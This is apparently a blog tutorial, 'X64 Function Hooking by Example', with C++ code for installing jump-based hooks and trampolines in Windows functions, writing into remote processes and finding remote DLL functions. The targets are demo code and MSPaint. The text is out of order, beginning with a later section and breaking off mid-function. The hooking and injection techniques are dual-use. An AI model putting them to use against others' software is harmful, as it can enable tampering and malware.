uint32_t WriteAbsoluteCall64(uint8_t* dst, void* funcToCall)
{
  check(IsProcess64Bit(GetCurrentProcess()));

  uint8_t callAsmBytes[] =
  {
    0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
    0x41, 0xFF, 0xD2, //call r10
  };
  memcpy(&callAsmBytes[2], &funcToCall, sizeof(void*));
  memcpy(dst, &callAsmBytes, sizeof(callAsmBytes));

  return sizeof(callAsmBytes);
}

uint32_t WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
  check(IsProcess64Bit(GetCurrentProcess()));

  //this writes the absolute jump instructions into the memory allocated near the target
  //the E9 jump installed in the target function (GetNum) will jump to here
  uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //mov 64 bit value into r10
                    0x41, 0xFF, 0xE2 }; //jmp r10

  uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
  memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
  memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
  return sizeof(absJumpInstructions);
}

uint32_t WriteAbsoluteJump64(HANDLE process, void* absJumpMemory, void* addrToJumpTo)
{
  check(IsProcess64Bit(process));

  //this writes the absolute jump instructions into the memory allocated near the target
  //the E9 jump installed in the target function (GetNum) will jump to here
  uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //mov 64 bit value into r10
                      0x41, 0xFF, 0xE2 }; //jmp r10

  uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
  memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));

  WriteProcessMemory(process, absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions), nullptr);
  return sizeof(absJumpInstructions);
}

uint32_t WriteRelativeJump(void* func2hook, void* jumpTarget)
{
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

  int64_t relativeToJumpTarget64 = (int64_t)jumpTarget - ((int64_t)func2hook + 5);
  check(relativeToJumpTarget64 < INT32_MAX);

  int32_t relativeToJumpTarget = (int32_t)relativeToJumpTarget64;

  memcpy(jmpInstruction + 1, &relativeToJumpTarget, 4);

  DWORD oldProtect;
  bool err = VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);
  check(err);

  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
  return sizeof(jmpInstruction);

}

uint32_t WriteRelativeJump(void* func2hook, void* jumpTarget, uint8_t numTrailingNOPs)
{
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

  int64_t relativeToJumpTarget64 = (int64_t)jumpTarget - ((int64_t)func2hook + 5);
  check(relativeToJumpTarget64 < INT32_MAX);

  int32_t relativeToJumpTarget = (int32_t)relativeToJumpTarget64;

  memcpy(jmpInstruction + 1, &relativeToJumpTarget, 4);

  DWORD oldProtect;
  bool err = VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);
  check(err);

  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));

  uint8_t* byteFunc2Hook = (uint8_t*)func2hook;
  for (int i = 0; i < numTrailingNOPs; ++i)
  {
    memset((void*)(byteFunc2Hook + 5 + i), 0x90, 1);
  }

  return sizeof(jmpInstruction) + numTrailingNOPs;
}


uint32_t WriteRelativeJump(HANDLE process, void* func2hook, void* jumpTarget)
{
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

  int64_t relativeToJumpTarget64 = (int64_t)jumpTarget - ((int64_t)func2hook + 5);
  check(relativeToJumpTarget64 < INT32_MAX);

  int32_t relativeToJumpTarget = (int32_t)relativeToJumpTarget64;

  memcpy(jmpInstruction + 1, &relativeToJumpTarget, 4);

  DWORD oldProtect;
  bool err = VirtualProtectEx(process, func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);
  check(err);

  err = WriteProcessMemory(process, func2hook, jmpInstruction, sizeof(jmpInstruction), nullptr);
  check(err);

  return sizeof(jmpInstruction);
}

HMODULE FindModuleBaseAddress(HANDLE process, const char* targetModule)
{
  HMODULE hMods[1024];
  DWORD cbNeeded;

  if (EnumProcessModules(process, hMods, sizeof(hMods), &cbNeeded))
  {
    for (uint32_t i = 0; i < (cbNeeded / sizeof(HMODULE)); i++)
    {
      TCHAR moduleName[MAX_PATH];

      // Get the full path to the module's file.

      if (GetModuleFileNameEx(process, hMods[i], moduleName,
        sizeof(moduleName) / sizeof(TCHAR)))
      {
        // Print the module name and handle value.
        if (strstr(moduleName, targetModule) != nullptr)
        {
          return hMods[i];
        }
      }
    }
  }

  return NULL;
}

void* FindAddressOfRemoteDLLFunction(HANDLE process, const char* dllName, const char* funcName)
{
  //first, load the dll into this process so we can use GetProcAddress to determine the offset
  //of the target function from the DLL base address
  HMODULE localDLL = LoadLibraryEx(dllName, NULL, 0);
  check(localDLL);
  void* localHookFunc = GetProcAddress(localDLL, funcName);
  check(localHookFunc);

  uint64_t offsetOfHookFunc = (uint64_t)localHookFunc - (uint64_t)localDLL;
  FreeLibrary(localDLL); //free the library, we don't need it anymore.

  //Technically, we could just use the result of GetProcAddress, since in 99% of cases, the base address of the dll
  //in the two processes will be shared thanks to ASLR, but just in case the remote process has relocated the dll, 
  //I'm getting it here separately.

  HMODULE remoteModuleBase = FindModuleBaseAddress(process, dllName);

  return (void*)((uint64_t)remoteModuleBase + offsetOfHookFunc);
}

void SetOtherThreadsSuspended(bool suspend)
{
  HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
  if (hSnapshot != INVALID_HANDLE_VALUE)
  {
    THREADENTRY32 te;
    te.dwSize = sizeof(THREADENTRY32);
    if (Thread32First(hSnapshot, &te))
    {
      do
      {
        if (te.dwSize >= (FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(DWORD))
          && te.th32OwnerProcessID == GetCurrentProcessId()
          && te.th32ThreadID != GetCurrentThreadId())
        {

          HANDLE thread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, te.th32ThreadID);
          if (thread != NULL)
          {
            if (suspend)
            {
              SuspendThread(thread);
            }
            else
            {
              ResumeThread(thread);
            }
            CloseHandle(thread);
          }
        }
      } while (Thread32Next(hSnapshot, &te));
    }
  }
}

struct X64Instructions
{
  cs_insn* instructions;
  uint32_t numInstructions;
  uint32_t numBytes;
};

X64Instructions StealBytes(void* function)
{
  // Disassemble stolen bytes
  csh handle;
  cs_open(CS_ARCH_X86, CS_MODE_64, &handle);
  cs_option(handle, CS_OPT_DETAIL, CS_OPT_ON); // turn ON detail feature with CS_OPT_ON

  size_t count;
  cs_insn* disassembledInstructions; //allocated by cs_disasm, needs to be manually freed later
  count = cs_disasm(handle, (uint8_t*)function, 20, (uint64_t)function, 20, &disassembledInstructions);

  //get the instructions covered by the first 5 bytes of the original function
  uint32_t byteCount = 0;
  uint32_t stolenInstrCount = 0;
  for (int32_t i = 0; i < count; ++i)
  {
    cs_insn& inst = disassembledInstructions[i];
    byteCount += inst.size;
    stolenInstrCount++;
    if (byteCount >= 5) break;
  }

  //replace stolen instructions in target func wtih NOPs, so that when we jump
  //back to the target function, we don't have to care about how many
  //bytes were stolen
  memset(function, 0x90, byteCount);

  cs_close(&handle);
  return { disassembledInstructions, stolenInstrCount, byteCount };
}

bool IsRelativeJump(cs_insn& inst)
{
  bool isAnyJumpInstruction = inst.id >= X86_INS_JAE && inst.id <= X86_INS_JS;
  bool isJmp = inst.id == X86_INS_JMP;
  bool startsWithEBorE9 = inst.bytes[0] == 0xEB || inst.bytes[0] == 0xE9;
  return isJmp ? startsWithEBorE9 : isAnyJumpInstruction;
}

bool IsRelativeCall(cs_insn& inst)
{
  bool isCall = inst.id == X86_INS_CALL;
  bool startsWithE8 = inst.bytes[0] == 0xE8;
  return isCall && startsWithE8;
}

bool IsRIPRelativeInstr(cs_insn& inst)
{
  cs_x86* x86 = &(inst.detail->x86);

  for (uint32_t i = 0; i < inst.detail->x86.op_count; i++)
  {
    cs_x86_op* op = &(x86->operands[i]);

    //mem type is rip relative, like lea rcx,[rip+0xbeef]
    if (op->type == X86_OP_MEM)
    {
      //if we're relative to rip
      return op->mem.base == X86_REG_RIP;
    }
  }

  return false;
}

template<class T>
T GetDisplacement(cs_insn* inst, uint8_t offset)
{
  T disp;
  memcpy(&disp, &inst->bytes[offset], sizeof(T));
  return disp;
}

//rewrite instruction bytes so that any RIP-relative displacement operands
//make sense with wherever we're relocating to
void RelocateInstruction(cs_insn* inst, void* dstLocation)
{
  cs_x86* x86 = &(inst->detail->x86);
  uint8_t offset = x86->encoding.disp_offset;

  uint64_t displacement = inst->bytes[x86->encoding.disp_offset];
  switch (x86->encoding.disp_size)
  {
  case 1:
  {
    int8_t disp = GetDisplacement<uint8_t>(inst, offset);
    disp -= int8_t(uint64_t(dstLocation) - inst->address);
    memcpy(&inst->bytes[offset], &disp, 1);
  }break;

  case 2:
  {
    int16_t disp = GetDisplacement<uint16_t>(inst, offset);
    disp -= int16_t(uint64_t(dstLocation) - inst->address);
    memcpy(&inst->bytes[offset], &disp, 2);
  }break;

  case 4:
  {
    int32_t disp = GetDisplacement<int32_t>(inst, offset);
    disp -= int32_t(uint64_t(dstLocation) - inst->address);
    memcpy(&inst->bytes[offset], &disp, 4);
  }break;
  }
}


//relative jump instructions need to be rewritten so that they jump to the appropriate
//place in the Absolute Instruction Table. Since we want to preserve any conditional
//jump logic, this func rewrites the instruction's operand bytes only. 
void RewriteStolenJumpInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
  uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size));

  //jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand
  //rewrite the operand for the jump to go to the jump table
  uint8_t instrByteSize = instr->bytes[0] == 0x0F ? 2 : 1;
  uint8_t operandSize = instr->size - instrByteSize;

  switch (operandSize)
  {
  case 1: instr->bytes[instrByteSize] = distToJumpTable; break;
  case 2: {uint16_t dist16 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist16, 2); } break;
  case 4: {uint32_t dist32 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist32, 4); } break;
  }
}

//relative call instructions need to be rewritten as jumps to the appropriate
//plaec in the Absolute Instruction Table. Since we want to preserve the length
//of the call instruction, we first replace all the instruction's bytes with 1 byte
//NOPs, before writing a 2 byte jump to the start
void RewriteStolenCallInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
  uint32_t numNOPs = instr->size - 2;
  uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size - numNOPs));

  //calls need to be rewritten as relative jumps to the abs table
  //but we want to preserve the length of the instruction, so pad with NOPs
  uint8_t jmpBytes[2] = { 0xEB, distToJumpTable };
  memset(instr->bytes, 0x90, instr->size);
  memcpy(instr->bytes, jmpBytes, sizeof(jmpBytes));
}

uint32_t AddJmpToAbsTable(cs_insn& jmp, uint8_t* absTableMem)
{
  char* targetAddrStr = jmp.op_str; //where the instruction intended to go
  uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);
  return WriteAbsoluteJump64(absTableMem, (void*)targetAddr);
}

uint32_t AddCallToAbsTable(cs_insn& call, uint8_t* absTableMem, uint8_t* jumpBackToHookedFunc)
{
  char* targetAddrStr = call.op_str; //where the instruction intended to go
  uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);

  uint8_t* dstMem = absTableMem;

  uint8_t callAsmBytes[] =
  {
    0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
    0x41, 0xFF, 0xD2, //call r10
  };
  memcpy(&callAsmBytes[2], &targetAddr, sizeof(void*));
  memcpy(dstMem, &callAsmBytes, sizeof(callAsmBytes));
  dstMem += sizeof(callAsmBytes);

  //after the call, we need to add a second 2 byte jump, which will jump back to the 
    //final jump of the stolen bytes
  uint8_t jmpBytes[2] = { 0xEB, uint8_t(jumpBackToHookedFunc - (dstMem + sizeof(jmpBytes))) };
  memcpy(dstMem, jmpBytes, sizeof(jmpBytes));

  return sizeof(callAsmBytes) + sizeof(jmpBytes); //15
}


/*build a "jump - sandwich" style trampoline. This style of trampoline has three sections:

    |----------------------------|
    |Stolen Instructions         |
    |----------------------------|
    |Jummp back to target func   |
    |----------------------------|
    |Absolute Instruction Table  |
    |----------------------------|

Relative instructions in the stolen instructions section need to be rewritten as absolute
instructions which jump/call to the intended target address of those instructions (since they've
been relocated). Absolute versions of these instructions are added to the absolute instruction
table. The relative instruction in the stolen instructions section get rewritten to relative
jumps to the corresponding instructions in the absolute instruction table.
*/

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
  X64Instructions stolenInstrs = StealBytes(func2hook);

  uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
  uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
  uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of a 64 bit mov/jmp instruction pair

  for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
  {
    cs_insn& inst = stolenInstrs.instructions[i];
    if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
    {
      return 0; //bail out on loop instructions, I don't have a good way of handling them 
    }

    if (IsRelativeJump(inst))
    {
      uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
      RewriteStolenJumpInstruction(&inst, stolenByteMem, absTableMem);
      absTableMem += aitSize;
    }
    else if (IsRelativeCall(inst))
    {
      uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
      RewriteStolenCallInstruction(&inst, stolenByteMem, absTableMem);
      absTableMem += aitSize;
    }
    else if (IsRIPRelativeInstr(inst))
    {
      RelocateInstruction(&inst, stolenByteMem);
    }

    memcpy(stolenByteMem, inst.bytes, inst.size);
    stolenByteMem += inst.size;
  }

  WriteAbsoluteJump64(jumpBackMem, (uint8_t*)func2hook + 5);
  free(stolenInstrs.instructions);

  return uint32_t((uint8_t*)absTableMem - (uint8_t*)dstMemForTrampoline);
}


void PushAddress(uint64_t addr) //push the address of the jump target
{
  hookJumpAddresses.push(addr);
}

//we absolutely don't wnat this inlined
__declspec(noinline) void PopAddress(uint64_t trampolinePtr)
{
  uint64_t addr = hookJumpAddresses.top();
  hookJumpAddresses.pop();
  memcpy((void*)trampolinePtr, &addr, sizeof(uint64_t));
}


void InstallHook(void* func2hook, void* payloadFunc)
{
  SetOtherThreadsSuspended(true);

  DWORD oldProtect;
  VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

  //102 is the size of the "pre-payload" instructions that are written below
  //the trampoline will be located after these instructions in memory
  void* hookMemory = AllocatePageNearAddress(func2hook);

  uint32_t trampolineSize = BuildTrampoline(func2hook, (void*)((char*)hookMemory + 102));

  uint8_t* memoryIter = (uint8_t*)hookMemory;
  uint64_t trampolineAddress = (uint64_t)(memoryIter)+102;

  memoryIter += WriteSaveArgumentRegisters(memoryIter);
  memoryIter += WriteMovToRCX(memoryIter, trampolineAddress);
  memoryIter += WriteSubRSP32(memoryIter); //allocate home space for function call
  memoryIter += WriteAbsoluteCall64(memoryIter, &PushAddress);
  memoryIter += WriteAddRSP32(memoryIter);
  memoryIter += WriteRestoreArgumentRegisters(memoryIter);
  memoryIter += WriteAbsoluteJump64(memoryIter, payloadFunc);

  //create the relay function
  void* relayFuncMemory = memoryIter + trampolineSize;
  WriteAbsoluteJump64(relayFuncMemory, hookMemory); //write relay func instructions

  //install the hook
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
  const int32_t relAddr = int32_t((int64_t)relayFuncMemory - ((int64_t)func2hook + sizeof(jmpInstruction)));
  memcpy(jmpInstruction + 1, &relAddr, 4);
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));

  SetOtherThreadsSuspended(false);
}

Wrap Up

This was a fun project to work on, and I feel like all of these hooking/hacking related projects have taught me an awful lot about stuff that I took for granted before. Hopefully it was as much fun to read about as it was to figure out. Who knows, maybe one day you’ll need to add an obnoxious triangle to a third party binary and some of this will come in handy.

I’ve got nothing else interesting to say so I guess that means it’s time to plug my Twitter hadle (@khalladay) and share a couple links I found helpful while figuring out to make this project work. Enjoy!

X64 Function Hooking by Example

2020-11-13T00:00:00+00:00

I’ve spent some time recently figuring out how function hooking works. There are tons of great resources available about it, but I’ve noticed that a lot of them are really light on providing example code, and the ones that do provide code tend to link to fully mature hooking frameworks. Usually the linked projects are really impressive, but they aren’t the easiest places to learn the basics from.

Now that I know enough to be dangerous, it seemed like fun to rectify this lack of sample code by building some hooking code from the ground up and walking through how to use that code to hook a running program. My past two blog posts were about making Notepad do weird stuff, so for the sake of variety, this post is going to pick on MSPaint instead.

I’m going to explain how to build 4 example programs. Two of them will show off fundamental hooking concepts by hooking functions in the example code itself. The other two will use those same concepts to hook MSPaint and make it disable the “Edit With Paint3D” button in a running MSPaint instance and force it to always draw with my favourite color (orange).

If you’re only interested in sample code, I’ve published a github repo called Hooking-by-Example which has 14 increasingly complex example programs that demonstrate how function hooking works (or at least, the bits of it that I’ve figured out). Everything that I talk about here (and more) is also demonstrated by the programs in that repo.

WTF is Function Hooking?

Function Hooking is a programming technique that lets you to intercept and redirect function calls in a running application, allowing you to change that program’s runtime behaviour in ways that may not have been intended when the program was initially compiled. It’s a little bit like when a dog gets into a car thinking they’re going to the park and ends up at the vet instead. The dog called goToPark(), but instead unexpectedly ended up inside goToVet() instead. This example isn’t great.

The real fun of function hooking is that you can use it to change the behaviour of programs that you don’t have the source code to, or otherwise can’t recompile. Combined with process injection (which I explained a bit in my last post), you can use function hooks to add entirely new behaviour to any program that you can run on your pc. For example, ReShade uses function hooking to add new postprocessing effects to games, and RenderDoc uses a form of hooking (although not the kind covered here) to allow you to debug graphics code in running applications.

More examples of things you might want to do with function hooking include:

Logging or replacing function arguments
Disabling functions
Measuing the execution time of a function
Monitoring or replacing data before it gets sent over a network

The only limits are your imagination and ability to read assembly!

How Does It Work?

Let’s say we have a function that adds two Gdiplus::ARGB values together, and we want to use a hook to bypass the addition logic and always return red. The ARGB type is a DWORD that uses a byte for Alpha, Red, Green, and Blue, respectively. Adding two of them together might look like this:

Gdiplus::ARGB AddColors(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
  uint32_t a = min(0xFF000000, (left & 0xFF000000) + (right & 0xFF000000));
  uint32_t r = min(0x00FF0000, (left & 0x00FF0000) + (right & 0x00FF0000));
  uint32_t g = min(0x0000FF00, (left & 0x0000FF00) + (right & 0x0000FF00));
  uint32_t b = min(0x000000FF, (left & 0x000000FF) + (right & 0x000000FF));

  return a | r | g | b;
}

The function that we want to replace it with (which I’ll call that “payload” function), looks like this:

Gdiplus::ARGB ReturnRed(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
    return 0xffff0000;  
}

If this was in your own code, you’d add a “return ReturnRed(left, right)” call to the beginning of AddColors(), recompile and call it a day, but what if you couldn’t recompile it? For example, what if it’s part of a closed source third party library, or the program that calls AddColors() is already running?

Rather than recompiling, we can use hooking to modify its instruction bytes instead, and replace the first instruction in AddColors() with a jmp to the beginning of the ReturnRed() function. This works even if the function we want to hook comes from a system dll, since DLL code segments are copy-on-write, so there’s no chance of a hook interfering with other processes.

Imagine that the first instruction in ReturnRed() is located 1024 bytes after AddColors() in memory. In assembly, replacing AddColors’ instructions with a jump will look like this:

The jump instruction used here is a relative jump with a 32 bit operand. The opcode is E9, and that’s followed by a 4 byte value that represents how many bytes to jump.

Notice that after the jmp instruction, we’re left with garbage. This is because the process of overwriting the first 5 bytes of AddColors() left a partial instruction in its wake. The first byte of the second instruction was overwritten, but the rest of the bytes are still there, and who knows what instructions those map to. That leaves the rest of the function in an unknown (and likely invalid) state. This doesn’t matter for the example, because the program is going to jump to ReturnRed() before it ever gets to the garbage we just created, but it’s important to keep in mind.

We’ll write some hooks that preserve the hooked function’s original logic later in this post, so don’t worry about that too much right now. For our first example, we’ll build a program that destructively hooks a function, exactly like what’s shown in the diagram above (with some extra sauce to handle 64 bit code).

Example 1: Our First Function Hook

Let’s roll with the example code already provided and write a program that actually redirects program flow from AddColors() to ReturnRed(). The game plan here is to end up with a main() function that looks like this:

//both functions inside the same program as main()
Gdiplus::ARGB AddColors(Gdiplus::ARGB left, Gdiplus::ARGB right);
Gdiplus::ARGB ReturnRed(Gdiplus::ARGB left, Gdiplus::ARGB right);

int main()
{
  //install a hook in AddColors, going to ReturnRed
  InstallHook(AddColors, ReturnRed);

  Gdiplus::ARGB col =  AddColors(0x00000000, 0x000000FF);
  printf("%x\n", col); //will always be 0xFFFF0000
  return 0;
}

In a 32 bit program, the logic for InstallHook() can be implemented pretty much exactly how the diagram above suggests it would be:

void InstallHook(void* func2hook, void* payloadFunction)
{
  DWORD oldProtect;
  VirtualProtect(AddColors, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);
    
  //32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
    
  //to fill out the last 4 bytes of jmpInstruction, we need the offset between 
  //the payload function and the instruction immediately AFTER the jmp instruction
  const uint32_t relAddr = (uint32_t)payloadFunction - ((uint32_t)func2hook + sizeof(jmpInstruction));
  memcpy(jmpInstruction + 1, &relAddr, 4);

  //install the hook
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

Things are a bit trickier in 64 bit, because functions can be located so far away from each other in memory that a 32 bit jmp instruction can’t jump that far, meaning that the 5 byte jump written by InstallHook() might be unable to reach the payload function from the hooked function.

There’s no such thing as a 64 bit relative jmp instruction, so the next best option is to jmp to an address stored in a register, like the assembly shown below. Note that this snippet uses the r10 register because it’s one of the few volatile registers that isn’t used for passing function arguments in the Windows x64 calling convention (msdn link)

49 BA 00 00 00 00 00 00 04 00   mov        r10,400h  
41 FF E2                        jmp        r10

If we throw this in the beginning of hooked functions instead of the 5 byte jump from before, we’d limit the number of functions that we could hook to those with 13 or more bytes. That’s a singificantly bigger limitation than our 32 bit code, so we’re instead going to write the bytes for this absolute jump somewhere in memory that’s close to the function we’re hooking. Then we’ll have the 5 byte jump we install in that function jump to this absolute jump, instead of straight to the payload function. Minhook refers to this absolute jump as the “relay function,” and I’m going to use that terminology as well.

Writing code to do this little dance is similar to the InstallHook() function shown above, but with a few more steps. The trickiest part of the process is allocating memory for the relay function that’s close enough to the target function to be reachable by a 5 byte jump. I’ve implemented logic for this in a function called AllocatePageNearAddress(). This function is a bit long, so I’ve included it’s implementation in the (expandable) box below, and omitted it from the sample code snippet immediately after that.

AllocPageNearAddress() implementation (click to expand)

void* AllocatePageNearAddress(void* targetAddr)
{
  SYSTEM_INFO sysInfo;
  GetSystemInfo(&sysInfo);
  const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

  uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
  uint64_t minAddr = min(startAddr - 0x7FFFFF00, (uint64_t)sysInfo.lpMinimumApplicationAddress);
  uint64_t maxAddr = max(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);

  uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

  uint64_t pageOffset = 1;
  while (1)
  {
    uint64_t byteOffset = pageOffset * PAGE_SIZE;
    uint64_t highAddr = startPage + byteOffset;
		uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

    bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

    if (highAddr < maxAddr)
    {
      void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr)
        return outAddr;
    }

    if (lowAddr > minAddr)
    {
      void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      if (outAddr != nullptr)
        return outAddr;
    }

    pageOffset++;

    if (needsExit)
    {
      break;
    }
  }

  return nullptr;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
  uint8_t absJumpInstructions[] = 
  { 
    0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //mov r10, addr
    0x41, 0xFF, 0xE2 //jmp r10
  }; 

  uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
  memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
  memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

void InstallHook(void* func2hook, void* payloadFunction)
{
    void* relayFuncMemory = AllocatePageNearAddress(func2hook);
    WriteAbsoluteJump64(relayFuncMemory, payloadFunction); //write relay func instructions

    //now that the relay function is built, we need to install the E9 jump into the target func,
    //this will jump to the relay function
    DWORD oldProtect;
    VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

    //32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset
    uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

    //to fill out the last 4 bytes of jmpInstruction, we need the offset between 
    //the relay function and the instruction immediately AFTER the jmp instruction
    const uint64_t relAddr = (uint64_t)relayFuncMemory - ((uint64_t)func2hook + sizeof(jmpInstruction));
    memcpy(jmpInstruction + 1, &relAddr, 4);

    //install the hook
    memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

With a bit of copy and paste magic, all the code snippets until now can be combined into our first example program. The end result is a small program that ends up calling ReturnRed() whenever we try to call AddColors(). The full code for this example is included in the expandable box below. Note that since this example creates x64 specific instructions for the relay function, it won’t work if it’s built as a 32 bit application. This will be the same for every example we build in this post.

Full Code For Example 1 (click to expand)

#include <Windows.h>
#include <stdint.h>
#include <stdio.h>
#include <memoryapi.h>

#include <gdiplus.h>
#pragma comment (lib, "Gdiplus.lib")
Gdiplus::ARGB AddColors(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
    uint32_t a = min(0xFF000000, (left & 0xFF000000) + (right & 0xFF000000));
    uint32_t r = min(0x00FF0000, (left & 0x00FF0000) + (right & 0x00FF0000));
    uint32_t g = min(0x0000FF00, (left & 0x0000FF00) + (right & 0x0000FF00));
    uint32_t b = min(0x000000FF, (left & 0x000000FF) + (right & 0x000000FF));

    return a | r | g | b;
}

Gdiplus::ARGB ReturnRed(Gdiplus::ARGB left, Gdiplus::ARGB right)
{
    return 0xffff0000;
}

void* AllocatePageNearAddress(void* targetAddr)
{
    SYSTEM_INFO sysInfo;
    GetSystemInfo(&sysInfo);
    const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

    uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
    uint64_t minAddr = min(startAddr - 0x7FFFFF00, (uint64_t)sysInfo.lpMinimumApplicationAddress);
    uint64_t maxAddr = max(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);

    uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

    uint64_t pageOffset = 1;
    while (1)
    {
        uint64_t byteOffset = pageOffset * PAGE_SIZE;
        uint64_t highAddr = startPage + byteOffset;
		    uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

        bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

        if (highAddr < maxAddr)
        {
            void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr)
                return outAddr;
        }

        if (lowAddr > minAddr)
        {
            void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr != nullptr)
                return outAddr;
        }

        pageOffset++;

        if (needsExit)
        {
            break;
        }
    }

    return nullptr;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
    uint8_t absJumpInstructions[] =
    {
      0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //mov r10, addr
      0x41, 0xFF, 0xE2 //jmp r10
    };

    uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
    memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
    memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

void InstallHook(void* func2hook, void* payloadFunction)
{
    void* relayFuncMemory = AllocatePageNearAddress(func2hook);
    WriteAbsoluteJump64(relayFuncMemory, payloadFunction); //write relay func instructions

    //now that the relay function is built, we need to install the E9 jump into the target func,
    //this will jump to the relay function
    DWORD oldProtect;
    VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

    //32 bit relative jump opcode is E9, takes 1 32 bit operand for jump offset
    uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };

    //to fill out the last 4 bytes of jmpInstruction, we need the offset between 
    //the relay function and the instruction immediately AFTER the jmp instruction
    const uint64_t relAddr = (uint64_t)relayFuncMemory - ((uint64_t)func2hook + sizeof(jmpInstruction));
    memcpy(jmpInstruction + 1, &relAddr, 4);

    //install the hook
